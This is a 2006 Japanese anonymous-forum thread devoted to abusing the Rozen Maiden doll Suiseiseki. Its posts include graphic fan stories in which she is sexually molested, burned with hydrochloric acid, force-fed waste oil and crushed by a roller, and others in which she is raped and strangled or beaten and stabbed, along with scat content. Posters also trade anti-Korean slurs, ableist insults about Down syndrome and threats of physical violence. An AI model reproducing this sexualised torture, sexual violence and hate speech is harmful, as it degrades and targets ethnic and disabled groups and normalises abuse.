「おはよう翠星石。」
声がしたので振り向くと、作業服を着て軍手を嵌めた若い男が立っていた。
「誰ですぅ?」
「俺はエリック。この工場で働いてる。今日は君をスクラップにするから。」
「はぁ?」
突然の事で訳も分からずキョトンとする翠星石。
「実は、君の持ち主から君を廃棄処分する様に依頼されたんでね。今朝早く業者が鞄に入った君ごと回収してここに持って来たんだよ。」
「ジ、ジュンが私を捨てたって言うですか?どうして…」
「さあね、とにかく今から君をスクラップにするからね。」
「嫌ですぅ!逃げるですぅ!」
そう言うと翠星石は鞄ごと飛んで逃げようとした。
しかし素早くエリックがロングヘアーを掴んで鞄から引きずり出した。
「痛いです!離しやがれですぅ!」
バキッ!顔面を殴りつける。
「ふぐっ!」
「逃げられると思ってんのかバカめ!」
ドスッ!今度は腹を殴る。
「痛いですぅ!何しやがるです!」
「嫌ぁぁぁ〜!!やめるです!お前は変態ですぅ!!翠星石の大切なドレスがぁ〜!」
喚くクソミドリに構わずエリックはドレスの残った部分とペチコート・スカートパニエを剥ぎ取った。
翠星石は頭上のヘッドドレスを除き一糸纏わぬ全裸となったのである。
「うう…恥ずかしいですぅ。どうして私ばっかこんな目に…」
今にも泣き出しそうな顔をする翠星石。
次の瞬間、反射的にビクッと体を動かした。
エリックが翠星石の局部を手で撫でたのである。

454 :名無しちゃん…電波届いた?:2006/12/08(金) 20:40:59
「や、やめろですぅ!この変態野郎!!」
「お前を造った人形師はかなりの変態だなぁ。こんなに精巧で緻密にココが再現されているとは…」
「お父様を悪く言うなです!お前みたいなキチガイ変態野郎と一緒にすんなですぅ!!」
「これ以上この誇り高き薔薇乙女第3ドール・翠星石を汚す事は許さんですよ!!」
元来負けん気の強い翠星石の毒舌が冴えわたる。
「とっとと解放して翠星石に謝罪しやがれですぅ!許さんですよ変態!」
バキッ!エリックの左ストレートが糞翠の顔を直撃!
「ふぐぅ!」
こうるさいクソミドリを黙らせる事に成功した。
その後エリックは透明な液体入りのビンを持って来た。
そしてゆっくりと蓋を開け翠星石の両膝の関節部にその液体をかけた。
ジュワ〜ッ!モクモクと白煙が上がり、翠星石の悲鳴が場内に響き渡る。
「キャアアアア〜〜!!!」
甲高くて耳障りな声だ。
「す、翠星石の足がぁ〜!!熱い…痛いですぅ!!」
「フフフ…どうだ、濃度25%の塩酸を浴びた感想は?次はここだ!!」
バシャ〜ッ!エリックは残りの濃塩酸を翠星石の「おまんまん」にぶちまけた。
「ヒギャアアアアアア――!!!」
凄まじい絶叫と共に失神するクソミドリ。
陰部からは大量の煙りが上がっている。
エリックは翠星石が気絶してる間に大鉈で両膝を切断した。
先程塩酸をかけられていた為表面に腐食が起り、切断を容易にした。
ドコン!「げふぅ!」
鉄パイプで腹を殴打する。
今の衝撃で目を覚ますクソミドリ。
「うう……」
「寝てんじゃねぇ!糞ミドリ虫が!!」
怒鳴るエリック。
「足がぁ…両足が無いですぅ!おまんまんも痛いですし…うぅ…うっうっ」
翠星石は泣き出した。とめどなく涙が溢れる。

455 :名無しちゃん…電波届いた:2006/12/08(金) 20:42:35
「うぅ…うっうっえぐっ…グスン翠星石はジャンクになってしまったですぅ…」
「馬鹿か貴様?元からジャンクだろうが屑が!」
そう言うとエリックはまたもや謎の液体入りのビンを持って来た。
「飲めよ」
「そんなもの飲める訳ねぇです!!」
「安心しろ、これは塩酸じゃない」
エリックは翠星石の口に指を突っ込んで無理やりこの液体を飲ませた。
「うぅ!ゴボッ、ゲボッ!や、やめろです!く、苦しいでふぅ」
吐き出さない様に鼻と口をしっかりと塞ぐ。
コップ一杯分の液体を飲まされたクソミドリ。その直後嘔吐した。
「ゲボァ―ッ!ゲ―ッゲロゲロ」
「ハハハ美味いだろう?廃油の味は?汚れた工業用オイルだぜ」
「ゲホッ!ゲホッゲフッ!」
本当に苦しそうな翠星石。顔は涙と吐瀉物で汚れている。
「苦しいですぅ…もうやめて下さいですぅ…」
すっかり弱りきった様子だ。
エリックは再び鉄パイプを持つと翠星石を殴り始めた。
ガン!ガン!ガン!ドスッ!「ぐふぅ!」
「人形の分際で人間と同じ物食いやがってよ、食い意地の張った豚野郎め!そのくせ人間を馬鹿にする様な態度と喋り方しやがって、
 何様だよテメェ!!」
鉄パイプを振るう腕に力がみなぎる。
エリックの怒りと憎しみは頂点に達しつつあった。

456 :名無しちゃん…電波届いた?:2006/12/08(金) 21:51:43
皆頑張ってるおね^^
おらもちょっとだけお手伝いだお^^!

泣き叫ぶ糞翠を裸にひん剥いて、軽トラで町中引きずり回したいお^^
町に住めんようにしてやるおヽ^^ ノ

457 :>>455の続き:2006/12/08(金) 22:58:16
数分後、全身を乱打された翠星石はぐったりしていた。
エリックは金属の枷を外すと、糞翠を床に叩きつけた。
ドシャーン!身をかがめてロングヘアーを掴むと、そのまま引きずって、ベルトコンベアーの上に乗せた。
スイッチを入れると、ギューンゴゴゴ…という轟音と共にベルトコンベアーが動き出した。
ベルトコンベアーの先には巨大なローラーが待ち構えていた。
両足を失い、局部を塩酸で焼かれ、廃油を飲まされた上に全身を激しく乱打された翠星石は、
ボロボロになりながらもかろうじて動く両腕だけでそこから逃れようとした。
「ハァハァ…そ、蒼星石…ジュン…うぅ…」
呻きながら這いつくばる。しかし運命は残酷だった。
グシャーッ!バリバリバリバリン!!!ローラーは容赦なく翠星石の体を押し潰した。
バラバラに砕かれたビスク素体の破片は切り裂かれた下着やドレス、靴、
そして人工精霊スイドリーム入りの鞄ごと焼却炉に投げ込まれた。
ここに翠星石ことクソミドリの廃棄処分が完了したのである。

458 :名無しちゃん…電波届いた?:2006/12/09(土) 06:55:37
↑ドブス朝鮮人真紅の臭い糞でも喰ってろ!!!!!!!!!11きちがい!!!!!11!!!



ところで今!!!!11気付いたんだけど!!!!!111!!
糞真紅萎ドブスはダウソ症なのじゃないかしら!!!!!!!!111!!!!!11
翠ちゃんのかわいらしいぱっちりおめめと違って!!!!!1!あの朝鮮人のような不細工な細目!!!!!1醜い!!!!11
ダウソ症に特有の目だわ!!!!!!!!111!!池沼!!!!!!11!!!!!!
あんな目がいいなんて真紅厨はブス専確定ね!!!!!!11!!!気持ちわる!!!!!1111111

459 :名無しちゃん…電波届いた?:2006/12/09(土) 08:45:50
>>458
蒼星石>>>>>>>>>>>>水銀燈>>>>>>>>巴>>真紅=金糸雀=雛苺=雪華綺晶>>>>>洗濯のり>ジュン>>>>>>>梅岡

おk?
ん?なに??薔薇水晶と糞翠がいないって???
だって奴らはアニメオリジナルキャラじゃねぇかwwwwwww

460 :名無しちゃん…電波届いた?:2006/12/09(土) 09:04:18
>>458
ダウン症ってのは、先天的染色体異常で発症する病気だから
染色体の無い人形が発症する訳無いお^^
チョン君は頭おかしいお…^^;

糞翠をおらの愛が籠もった腹パンチで叩き起こしたいお^^
起きやがったら、今度は満面の笑みで顔面パンチだお^^つ)゚A。∴;デズゥ

461 :名無しちゃん…電波届いた?:2006/12/09(土) 10:02:09
>>460
糞翠が寝付くまで何度でもパンチしてあげるとは優しいですね

462 :名無しちゃん…電波届いた?:2006/12/09(土) 21:11:38
皆さん!!!!!!!!!!!!!!!
ここは池沼朝鮮人が汚い妄想を垂れ流す公衆便所です!!!!!!!!!!!
良い子はこんな臭いとこに書き込まないで!!!

463 :名無しちゃん…電波届いた?:2006/12/09(土) 21:27:15
>>462
      ___
    く/',二二ヽ> 
     |l |ノ。ノイハ)) 粘着厨の池沼が言っても説得力ないですぅ
     |l |(* 々゚ノ|  
   ≦ノl/ っっl≧
   ミ  しー‐J ミ

464 :名無しちゃん…電波届いた?:2006/12/09(土) 21:57:29
>>462
おらは悪い子だから、どんどん書き込んじゃうおー♪ヽ^^ ノ

糞翠と一緒に富士サ〇ァリパークに行きたいお^^

んで、糞翠だけライオンのトコに放置して帰って来るお^^ノシ


465 :名無しちゃん…電波届いた?:2006/12/09(土) 23:23:16
子ライオンの狩りのいい練習相手になるねw

466 :名無しちゃん…電波届いた?:2006/12/10(日) 04:00:52
>>466なら翠星石はローゼンメイデンから追放決定。

467 ::2006/12/10(日) 16:26:21
えーと・・・ いっておきますが翠星石いじめるのはいいとして翠星石
じゃないキャラはやめといたらどうですか?
そりゃいじめるのもよくないけど・・・
ローゼンメイデンが好きなら翠星石も真紅も雛苺もみんないじめないのが
本当のローゼンファンじゃないんですか?

468 :名無しちゃん…電波届いた?:2006/12/10(日) 16:40:12
翠星石

469 :名無しちゃん…電波届いた?:2006/12/10(日) 17:15:29
>>467
あなたはローゼンメイデンという作品を本当に愛してるんですね。
故に、ここの住民の行為が許せなくて、自分の理念を理解して貰おうとしてるのは分かります。

ですが、世の中あなたと同じ様な考え方の人ばかりではないんですよ?

例えば、犬や猫を好んで飼う人、対して忌み嫌う人はたくさんいます。

「それと同じ」ですよ。

翠星石を始めとした、ローゼンメイデンの登場キャラクターを、好む人もいれば嫌う人もいる。

作品自体が好きでも、人によっては気に入らないキャラだって絶対にいます。
言うならば、ローゼンメイデンの第三ドールを「翠星石」と捉えるか「糞翠」と捉えるかの違いです。

梅岡を嫌ってる本スレの一部の人を咎めますか?

ここは、翠星石を忌み嫌う人がたまたま集まった場所、いわば異端地です。

外国の文化にとやかく文句をつけるのはよくありませんよ?
それでも文句をつけたいと言うならば、仕方ありませんが。

ちなみに、誤解の無いように言っておきますが、ここで翠星石以外を叩いてるのは、
!をやたら多様する馬鹿一人だけなので、悪しからず。

470 :名無しちゃん…電波届いた?:2006/12/10(日) 18:28:36
糞翠が嫌いでも他のドールが好きな香具師は結構いるんじゃない?
全てのキャラを嫌っていたらそれは「ローゼンメイデンのアンチ」になるわけで

まぁ中には「自分の好きなキャラ以外は皆朝鮮人」と決め付ける変わり者もいるけどねw

471 :名無しちゃん…電波届いた?:2006/12/10(日) 19:37:13
>>470
字足らずだった。
俺が文中で言いたかったのは、「翠星石を始めとした『全て』のキャラが」
じゃなくて「翠星石を始めとした『ある特定の』キャラが」だ。
なんか誤解を招いちゃって、スマソ。


472 :名無しちゃん…電波届いた?:2006/12/10(日) 22:24:29
巴以外は駄目

473 :名無しちゃん…電波届いた?:2006/12/11(月) 01:12:32
まぁ…ここは翠星石を虐待するスレみたいなものだからな。それ以外のキャラをいじめるのは確かにスレ違いだと思われるな。特にあの在日朝鮮人なんかがいい例。

474 :名無しちゃん…電波届いた?:2006/12/11(月) 02:28:12
萎ドブス真紅は糞糞糞糞!!!!!!!11朝鮮人!!!!!!!111
誰か!!!!!!!真紅の臭い肛門を破壊して垂れ流しにさせるSS書いて頂戴!!!!!11
そうすれば朝鮮人どもの今までの悪行も許すわ!!!!!!11!!!

475 :名無しちゃん…電波届いた?:2006/12/11(月) 03:57:34
真紅「いやぁ…お尻が…やめて…お願い…!!…助けて…ジュン…!」

翠星石「チュパチュパ…うめぇですぅw真紅のうんこうめぇですぅwww」

翠星石はそう言い、嫌がる真紅の肛門を舐め続けた。

翠星石「もう耐えられないです!真紅の肛門食べちゃうですぅ!!!」

真紅「い…いやああああああぁぁぁぁぁ!!!!!」

真紅の肛門は、翠星石に食べられてしまった…
fin

>>474おk?

476 :名無しちゃん…電波届いた?:2006/12/11(月) 05:24:08
つかちゃんとした翠星石の虐殺AA貼れよ、ですぅ〜
のの虐殺の改編じゃ萌えねぇんだよ、ですぅ〜


     /  /               l     \ ヘ ヽ   \
   /   /             /   l       \ }     \
\/./   /  /        / /   ∧   、    ヽl      \
./ /    /  /         / //  ∧ i.   i     ',      /
l i    i  /       ///./  / ', i   i     i    /
| ハ    .ト L___ ェニ ァ/ 人 /   ヽ i  _l     |  /
i い    | ィー‐,ニニ三/   / / ーェ、___,>r '´ | i   i |/
. V∧   |∧/ /フr::。}ヽ ./´   "^,rこニ;;、`ヽェi i   i |
 ∧ i.ヽ  lレ'  {::リー'::ソ  "      {rイ::::゚リ } // /   /ハ 
./  {\  iト、 ,〃ー―    ,      ヾこ.゙ソ  / /   // .|
'    } \ i ヽ""       `     ` ー‐" /イ   .イ /  l   
    ヽ  ト、     ,へ、___,,   〃/ /  ///  i  l   
.    r‐|i  i.>、.   /:::::"   ゛"::::::ヽ    / / /   i  l  
   _,.レ┴ニ ~ \   {::        :::}  イ 「___ ノ‐┐  i. l
  / /  / >、  } ` 、 ̄ `' ー ―‐ '´ .イイ^ヽ  `ト- {.   i l
. / / /  /  _.>、{    `;- _ _, -‐ ' ´, へ ヽ \ | 〈 ヽ  i l
" i    '  ´  }  /二コ T_\   |   `     } .〉 ',  i l
  i       イ'レ'´/  /「H. \\  }       ./ ./   }  i l

477 :名無しちゃん…電波届いた?:2006/12/11(月) 08:19:35
          ____
        / ―  -\
 ミ ミ ミ /   (●)  (●)       ミ ミ ミ
/⌒)⌒)⌒.      (__人__) \    /⌒)⌒)⌒)  
| / / /      ` ⌒´   | (⌒)/ / / //
| :::::::::::(⌒)    ___    /  ゝ  :::::::::::/
|     ノ  ∠/彡三ミゝ \  /  )  /
ヽ    /    |l(ノノイハ ))  ヽ/    /
.         |l从^ヮ^ノイ 翠星石はかわいい
          ノl_|(l_介」) |    ドールですぅ
         {ミノ`ヽノへ彡、
        ξく二二二〉そ
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄


         ____
       /_ノ  ヽ、_\
 ミ ミ ミ  o゚((●)) ((●))゚o         ミ ミ ミ
/⌒)⌒)⌒::::::⌒(__人__)⌒:::\    /⌒)⌒)⌒)
| / / /.    |r┬-|    | (⌒)/ / / //
| :;*::::(⌒)    | | |    /  ゝ   :。イハ:)/
|  ;*; ノ     | | |    \  /   )々;。/
ヽ  ξ/     `ー'´     ヽ/    介/
 |   |   l||l 从人 l||l   :;  l||l 从人 l||l
 ヽ    -一''''''"~~``'ー--、'.:;  -一'''''.:;'ー-、
  ヽ ____(⌒)(⌒・:⌒) ) ・:そ,;;、(⌒)⌒)⌒))
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄';,; ̄ ̄;:, ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ 
           '.:;      '.:; 


478 :名無しちゃん…電波届いた?:2006/12/11(月) 08:28:33
>>473
他のキャラを虐める以前にあいつがここに来ること自体スレ違い。ここは原則的に「翠厨お断り」だし。

>>474
別にお前に許される覚えなんてないんだが?真紅虐待スレとやらでも立ててずっと籠もっていろよw

479 :名無しちゃん…電波届いた?:2006/12/11(月) 19:28:34
ちょっと!!!!>>474!!!!1!!!!「!
翠ちゃんを庇いたい気持ちはわかるけど、
指摘があったことだし、これからはスマートにいきましょ!!!!!!!!

翠ちゃん虐める朝鮮人だけ叩くのよ!!!!11!!!!
キムチ臭い祖国に帰れ帰れ帰れ!!!1極悪朝鮮人!!!!!「

480 :名無しちゃん…電波届いた?:2006/12/11(月) 19:30:22
つかこのスレ腐女子しかいねーだろwww

481 :名無しちゃん…電波届いた?:2006/12/11(月) 19:48:32
>>478
つまらないよおまえwwwwwwwwwwしね!!!!!11乞食野郎!!!!!11ケツの穴野郎がwwww!!!11
>>479
偽物!!!!!!111私は句読点使わないわ!!!!!!111低脳お前もしね!!!!!!!111

482 :名無しちゃん…電波届いた?:2006/12/11(月) 20:00:09
今酷い自演を見たお><!!!!!!
^^つ>>479=481!!!!!!!!!11間違いないお m9(^Д^)!!!!1「
いや、そればかりか^^;!!!!2chで糞翠を擁護しているのは全部>>481^^#!!!!
一人でこんなに自演するなんて朝鮮人の粘着振りは恐ろしいお^m^!!!!!!!!!111
糞塗れの糞翠と一緒に国へ帰れおヽ^^ ノ!
国へ帰れお〇(≧▽≦)〇!!
国へ帰れお^^ノシ!!!
国へ帰れお^^つ)。A゚・;デズゥ!!!!
国へ帰れお^^^^^^^^^^!!!!!!!


483 :名無しちゃん…電波届いた?:2006/12/11(月) 20:28:19
>>481
もういい、日本語じゃなくてもいいから、地球上の言葉でおk


484 :名無しちゃん…電波届いた?:2006/12/11(月) 20:47:46
>>481
ねぇ!!!!いくらなんでもしねはないでしょ!!!!!!!!「
確かにあなたが人大杉の時勝手に暴れたのは悪かったけど
私も翠ちゃんを擁護したかっただけなのよ!!!!!!!11!
本当よ!!!!!信じてよ!1!!!!!!!」!
これからは一緒に朝鮮人を叩いてきましょうよほほほほほほほほほほ!!!!!1!!

485 :名無しちゃん…電波届いた?:2006/12/11(月) 21:02:22
>>482
見事な改変乙です!

486 :名無しちゃん…電波届いた?:2006/12/11(月) 21:12:21
>>481=>>484
        /'''''ヽ        /ヽ        |'''''''ヽ       _
        /  /        |  ヽ       .|  ィ        \ '''''‐‐-────── ヽ
       /  /         \  ヽ l───┘ .└───‐ヽ  \          _  .\
      /  /            \/ | ┌──────┐ )    ̄ ̄ ̄ ̄ ̄ ̄ ̄/  /
  |  ̄ ̄    ̄ ̄ ̄ ̄'\  へ    .|,,,.ノ | ̄ ̄ ̄ ̄ ̄|  |/             /  /
  .|  i‐‐‐───‐''''|  | |  \       ̄ ̄| | ̄ ̄               /  /
   |  .|         |  .|  \  ヽ   | ̄ ̄ ̄  ̄ ̄ ̄ヽ           /  /
   |   ̄ ̄ ̄ ̄ ̄ ̄  |   \ノ    |  | ̄│ .| ̄ ̄|  |         /  /
   |  .i‐‐‐───‐''''|  |         |   ̄ ̄  ̄ ̄  |       /  /
   |  .|        .|  .|     /\  |  | ̄│ .| ̄ ̄| .|     ./  /
   |  . ̄ ̄ ̄ ̄ ̄ ̄  |    /  /  .|   ̄ ̄  ̄ ̄  |    /   /
   |  .!‐‐‐‐───''''|  .|   ./  ./    ̄ ̄ ̄ ̄ ̄ ̄ ̄    /  /             ./|
   |  .|        .|  .|   ./  ./    /\  ( \      |   |            /  |
  .|  . ̄ ̄ ̄ ̄ ̄ ̄  .|  /  /   / /   ヽ  \    |   ヽ───────┘  |
   ゝ、______,,,,,,,,,.ノ  ゝ、/  /_/     \_ \   \___________,,,.

487 :翠ちゃん=現人神wwww!!!!111 ◆wj7tW.6Gg. :2006/12/11(月) 22:23:12
>>484
この下痢便野郎!!!!!!11!!お前みたいな偽物のせいで自演言われとうやないの!!!!1111
鳥付けたる!!!!!!11お前ら只で済むと思うなよ!!!!1111わし族やっとるけんの!!!1111
五体満足に年越せると思うなや!!!!11!!!お年賀にひとりびとり真紅の軟便玄関にぶちまけたる!!!!11!!

488 :名無しちゃん…電波届いた?:2006/12/11(月) 22:26:31
>わし族やっとるけんの

族が2chに引き篭もる粘着厨でつか?w

489 :名無しちゃん…電波届いた?:2006/12/11(月) 23:26:08
すごいお><
ヤンキーあがりの北朝鮮パワー全快だお!!

こっちも虐待パワーで対抗するお 〇(≧▽≦)〇


糞翠におらの愛を込めた剃刀レター送りたいお^^

490 :名無しちゃん…電波届いた?:2006/12/11(月) 23:50:24
>>487
鳥まで付けるなんて流石本物は格が違いますわ!!!!!!11!

もうあなた様を装ったりしませんから!!!!1「
どうかこれから一緒に朝鮮人どもを叩いて下さい!!!!!!
勝手にあなた様を装ったりしてごめんなさい!!!!!!!1
でも私は野郎じゃありません!!!!!!!
悪しからず!「!!」!!

491 :名無しちゃん…電波届いた?:2006/12/11(月) 23:59:17
>>489
早速こんなところにビチグソが!!!!11!!!1!
金日成の亡霊にとり付かれた朝鮮人め!1!!1!!!!!!!「


今すぐに!!!!!!11!メタ○リックな親玉のいる!!」
北朝鮮に!!1!!帰りなさい!!!!!!「1

492 :翠ちゃん=現人神wwww!!!!111 ◆wj7tW.6Gg. :2006/12/12(火) 00:22:16
>>490-491
誰がお前なんか相手にするか!!!!111偽物しね!!!!!1111!!!!きも腐女子が!!!11「
お前なんかどうせ真紅みたいなデブ顔面崩壊垂れ流しの三重苦だろうがはげ!!!!1111!きも豚が!!!!11
朝鮮行って真紅豚のうんこでも喰っとけ!!!!1111脱糞女が!!!!11!!

493 :名無しちゃん…電波届いた?:2006/12/12(火) 00:24:21
>>491
糞翠を頭だけ出した状態で地面に埋めて、ゴルフクラブでかっ飛ばしたいお^^

バキッ

あぁっ、ダフっちゃったお…ごめんお^^;

でも、顔が半分抉れた糞翠も可愛いお^^


494 :名無しちゃん…電波届いた?:2006/12/12(火) 00:28:10
>>492
次回の原作は予定変更して、糞翠以外のドールズ全員が離脱したnのフィールドで
木刀持ったおらが全裸の糞翠と鬼ごっこする話を描いて欲しいお^^


495 :名無しちゃん…電波届いた?:2006/12/12(火) 01:30:59
どうか>>494さんは朝鮮人のようにトリップ付けて変な自己主張しないでくださいね。

496 :名無しちゃん…電波届いた?:2006/12/12(火) 02:07:10
          ____
        / ―  -\
 ミ ミ ミ /   (●)  (●)       ミ ミ ミ
/⌒)⌒)⌒.      (__人__) \    /⌒)⌒)⌒)  
| / / /      ` ⌒´   | (⌒)/ / / //
| :::::::::::(⌒)    ___    /  ゝ  :::::::::::/
|     ノ  ∠/彡三ミゝ \  /  )  /
ヽ    /    |l(ノノイハ ))  ヽ/    /
.         |l从^ヮ^ノイ 翠星石=現人神ですぅ
          ノl_|(l_介」) | 
         {ミノ`ヽノへ彡、
        ξく二二二〉そ
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄


         ____
       /_ノ  ヽ、_\
 ミ ミ ミ  o゚((●)) ((●))゚o         ミ ミ ミ
/⌒)⌒)⌒::::::⌒(__人__)⌒:::\    /⌒)⌒)⌒)
| / / /.    |r┬-|    | (⌒)/ / / //
| :;*::::(⌒)    | | |    /  ゝ   :。イハ:)/
|  ;*; ノ     | | |    \  /   )々;。/
ヽ  ξ/     `ー'´     ヽ/    介/
 |   |   l||l 从人 l||l   :;  l||l 从人 l||l
 ヽ    -一''''''"~~``'ー--、'.:;  -一'''''.:;'ー-、
  ヽ ____(⌒)(⌒・:⌒) ) ・:そ,;;、(⌒)⌒)⌒))
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄';,; ̄ ̄;:, ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ 
           '.:;      '.:; 

497 :名無しちゃん…電波届いた?:2006/12/12(火) 12:46:44
>>1-496
全員死ねよキチガイどもwwwwwwwwwwwwwwwwwwwwwwwww
引き篭もりの毒電波どもがよwwwwwwwwwwwwwwwwwwwwwww

498 :名無しちゃん…電波届いた?:2006/12/12(火) 15:45:51
「ですぅ…ですぅ…」
あぁぁたまらないよ翠星石…その口調が今夜も僕を狂わせるよ…
「や、やめろです!助けて!嫌ぁっ〜〜!!!」
月明りに光る白銀のナイフが今、翠星石の柔らかい胸板を貫いた………
ハァハァ…翠星石、痛かった?もっと優しく愛してあげるね。
…チュパチュパペロ…君の涙も塩辛いんだね…
「ふぐぅ…うぅ…痛いですぅ…痛いですよぅ」
僕は翠星石の頬を伝う涙を舐めながらナイフを更に突き立てるのだった…
ふふふ…翠星石、ドレスをぬがしてあげるよ…
「嫌っ!やめてですぅ!」
抵抗も空しく全裸にされた翠星石。
ペロペロハァハァチュパア〜小さくて柔らかい乳房と乙女の恥部を舌でしゃぶる。
…僕のもしゃぶってもらおうかな。翠星石の口元に男根を近付ける。
「やですぅ!何しやがるです!」
…嫌じゃねぇだろ!!…僕は突然怒鳴った。ナイフを喉元にあてがい、脅した。
「うぅ…ぐすん…なんでこんな目に遭うです…」
翠星石…今日から君は僕の“肉人形”だ。メス豚として調教してやる。
従順で素直な乙女になる様に…刃向かえば、切り刻んでやる…。
チュプチュパんぐ…あぁ、出る!ドパァ〜翠星石の口の中は白濁液で溢れている。
「ごくっ…んめ〜ですぅ」
…ふふふすっかり淫らなメス豚になったな…三ヶ月も毎夜調教した甲斐があったものだ。
そろそろ仕上げにかかるとしよう…。
「ご主人様ぁ〜おまんまんして欲しいですぅ…ハァハァもう我慢出来ね―ですぅ!」
ヌプ…パンパンパン…「あ、あん!あん!気持ちいいですぅ!」
そして僕は正常位で交わりながら、両手を翠星石の首にかけ、一気に締め上げた。
「うぐぅ!く、くるし…ですぅ!」
翠星石の口から唾液が垂れている…そして動かなくなった。
真夜中の室内を緑色の美しい発光体が浮遊している。
僕はローザミスティカと呼ばれるそれを手に取って呟いた。
…次こそはアリスを…何故なら僕は人形師なのだから…

499 :名無しちゃん…電波届いた?:2006/12/12(火) 15:46:24
「おっはよ〜ですぅ!今日も駄目人間とうんざりな一日の始まりですぅ!」
次の瞬間、俺は閃光のごとき早さで糞翠の腕を掴むと、勢い良く壁に叩きつけた。
ドシャーン!!
「ぐはっ!…ふぅ…ですぅ」
「何しやが!?」
糞翠が喋る前に顔を思いっきり殴る。
バコーン!!
「ぶふぅっ!!」
汚ぇ唾液が飛沫となって宙を舞う。
「痛いですぅ!!ふざけんなですぅ!何で翠星石がこんな目にあわなきゃならないです!?」
「俺の知った事か!!」
ドスッ!ドコッ!ベシッ!
更に暴行を加える。
気がすむまで殴る蹴る…
ふと我に返ると、眼前には緑色のボロクズが口から泡を吐きながら仰向けに倒れていた。
俺はボロクズの顔に唾を吐くと、奴の体をサッカーボールの様に蹴飛ばし始めた。
ドスッ!ドスッ!ドガッ!
クソミドリは不様にも階段を転げ落ちて玄関に蹲る格好となった。
「ぐふぅ!げほっ!ハァハァハァハァ…く、苦しいですぅ!やめてですぅ…」
衝撃で目覚めた糞翠は全身の激痛に地獄の様な苦しみを味わうのだった。
俺は瀕死の糞人形の胸倉を掴むと、開け放たれているドアの外に投げつけた。
アスファルトの上で息も絶え絶えに
「うぅ…痛いですぅ…誰か助けてです…」
等と呟く。
…とどめを刺すべくキッチンから持って来た包丁で糞翠の左胸目がけて深々と突き刺す。
グサァ〜
「!!うぐぅ!ひっぐ、ですぅ…」
絶命した…。
俺はその後、このジャンク人形の不様な亡骸を、外のゴミ捨て場の生ゴミのポリバケツにぶち込んでおいた。
キラキラ光るローザミスティカにも目をくれずに………

500 :名無しちゃん…電波届いた?:2006/12/12(火) 16:54:36
在日朝鮮人君はジエンしててしかもDQNとな!!?

しかしDQNで粘着翠厨とは…
ほんと、
生 き て い て 、 恥 ず か し く な い の ?

501 :名無しちゃん…電波届いた?:2006/12/12(火) 19:32:28
>>495
おらは、トリップつけるつもりないお^^
チョン君みたいに派手に目立ちたい訳じゃないし。
元々、こんな口調で書き込んでる内に、スレに居ついちゃっただけの名無しだお^^

そもそもトリップ付けると、何か隠し事してるみたいで嫌だし、
チョン君みたいな人に、トリップ曝されて変な煽りされるのも嫌だからしたくないお^^;

って言うか、もしおらがトリップ付けるとしたら、何かマズイのかお^^;?
ウザイとか?だったら自重するお^^…

502 :名無しちゃん…電波届いた?:2006/12/12(火) 19:45:17
>>501
いいえ!ウザイとは思っていません。トリップを付けたことであの朝鮮人に
「あなたも鳥つけたのね!!!!!!!111金日成の子飼い共が!!!!!!!!1111」
って言われたら悔しいだろうなあと思いまして。

503 :名無しちゃん…電波届いた?:2006/12/12(火) 19:49:14
>>500
ちょっと!!!!!!!1
翠ちゃん=現人神WWWW!!!!111◆wj7tW.6Gg.様と私は別人よ1!!11!!」1
勝手に自演って決め付けるなんて最低ね!!!!111
朝鮮人しね!!!!!1111!!!!キムチ魔人が!!!1「
国に帰ってキムチ臭い糞でも垂れてろ!!!!1111
このうんこたれが!!!!11!!

504 :電波男 ◆2.4GHzYCmM :2006/12/12(火) 19:53:32
凄い…
このスレは凄い電波を感じる…

505 :名無しちゃん…電波届いた?:2006/12/12(火) 20:00:16
>>502
そっか…そういう事か。
無駄に深く考えちゃってごめんなさい。

気遣っていただいて感謝いたしますm(__)m
返事が遅れたこともお詫びしておきます。


…と、大切な話してる間にま〜た>>503にチョン君が…^^;
糞翠と一緒にお仕置きしてあげるしかないお^^#

糞翠を全裸で外に放り出して、ホースで水ぶっかけたいお^^
チョン君は熱湯風呂に入れてあげるお^^
10000数えるまで出してあげないお^m^

506 :名無しちゃん…電波届いた?:2006/12/12(火) 20:09:44
>>504-505
おらおら!!!!!!11
この糞電波ども!!!!!!!!」11
あんま調子に乗ってると裸にひんむいて鞭打ちしたるぞワレェ!!!!!「11

二度と祖国の土が踏めんようにしたるから覚悟しいやWwWWWWWWwWWwW!w!1!!!!!!

507 :名無しちゃん…電波届いた?:2006/12/12(火) 21:00:50
どーしたよ朝鮮人!!!!!!11「!
びびってんのかゴラァあああああ!!!1!!!!!!11
これに懲りたら二度と私の翠ちゃんを虐めんなや!!!!!!!」1!!
解ったか!!!ビチグソ下痢便キムチ魔人がぁああああああWWWwWWWwWWwWWwwWWWW

508 :名無しちゃん…電波届いた?:2006/12/12(火) 21:06:49
>>507を翠星石が嫌っている件

509 :名無しちゃん…電波届いた?:2006/12/12(火) 21:17:41
>>508
なんじゃ貴様11!!!!1!!!1!「
金正日の回し者めが!!!!1!」!!!
最初の鞭打ちはお前じゃあああああああああ!!!WWWwwWWwWWWWうぇWWkdjcjgjdamdうぇえWWwWWWWWWWw
以降翠ちゃん叩いた奴皆鞭打ちじゃあああああああああああああ!!!!!

510 :名無しちゃん…電波届いた?:2006/12/12(火) 22:07:12
>>509
      ___
    く/',二二ヽ> 
     |l |ノ。ノイハ)) ほれほれ、叩いて見やがれですぅ
     |l |(* 々゚ノ|  朝鮮人乙ですぅ
   ≦ノl/ っっl≧
   ミ  しー‐J ミ

511 :翠ちゃん=現人神wwww!!!!111 ◆wj7tW.6Gg. :2006/12/14(木) 00:57:06
>>509
偽物!!!!!!!111!!!「いいかげんにして!!!!!111!!
お前おちつけ!!!!!1111「暴走しすぎ!!!!111
翠ちゃんフアンの品性が問われちゃう!!!!!!11!!!やめて!!!!!!11「」

512 :名無しちゃん…電波届いた?:2006/12/14(木) 01:11:17
